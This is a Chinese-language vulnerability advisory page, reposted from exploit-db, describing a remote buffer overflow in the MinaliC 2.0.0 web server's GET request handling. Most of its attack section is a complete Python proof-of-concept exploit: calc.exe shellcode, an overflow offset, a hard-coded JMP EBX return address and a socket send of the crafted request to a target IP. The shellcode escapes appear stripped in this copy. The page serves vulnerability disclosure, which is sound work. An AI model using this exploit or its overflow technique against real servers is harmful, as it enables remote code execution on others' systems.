Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / MinaliC 远程缓冲区溢出漏洞

发布日期:2013-04-15
更新日期:2013-04-17受影响系统:
sourceforge MinaliC 2.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59056
 
MinaliC Webserver是C语言开发的Windows上的小型多线程网络服务器。
 
MinaliC 2.0.0处理GET请求时可触发远程缓冲区溢出漏洞,攻击者可利用此漏洞在应用上下文中执行任意代码。
 
<*来源:superkojiman
 
 链接:http://www.exploit-db.com/exploits/24958/
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python # Exploit Title: MinaliC Webserver buffer overflow
 # Date: 12 Apr 2013
 # Exploit Author: superkojiman - http://www.techorganic.com
 # Vendor Homepage: http://minalic.sourceforge.net/
 # Version: MinaliC Webserver 2.0.0
 # Tested on: Windows XP Pro SP2, English
 #
 # Description:
 # Remote command execution by triggering a buffer overflow in the GET
 # request.
 # import socket
 import struct # 74 bytes calc.exe from http://code.google.com/p/win-exec-calc-shellcode/
 shellcode = (
 "x31xd2x52x68x63x61x6cx63x89xe6x52x56x64x8bx72" +
 "x30x8bx76x0cx8bx76x0cxadx8bx30x8bx7ex18x8bx5f" +
 "x3cx8bx5cx1fx78x8bx74x1fx20x01xfex8bx4cx1fx24" +
 "x01xf9x0fxb7x2cx51x42xadx81x3cx07x57x69x6ex45" +
 "x75xf1x8bx74x1fx1cx01xfex03x3cxaexffxd7xcc"
 ) # EIP at offset 245 when minalic.exe is in C:minalicin
 # EBX points directly to the "Host:" value, so we put our shellcode there.
 # JMP EBX @ 0x7C955B47, NTDLL.DLL, Windows XP Pro SP2 English junk = "x41" * 245
 ret = struct.pack("<I", 0x7C955B47)
 host = "x90" * 30 + shellcode + "x90" * 31 buf = "GET /" + junk + ret + " HTTP/1.1 " + "Host: " + host + " " print "[+] sending buffer size", len(buf)
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(("192.168.37.132", 8080))
 s.send(buf)建议:
--------------------------------------------------------------------------------
厂商补丁:
 
sourceforge
 -----------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://mod-security.svn.sourceforge.netGoogle Chrome OS 26.0.1410.57之前版本多个安全漏洞RubyGems "md2pdf"远程命令注入漏洞(CVE-2013-1948)相关资讯      MinaliC  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图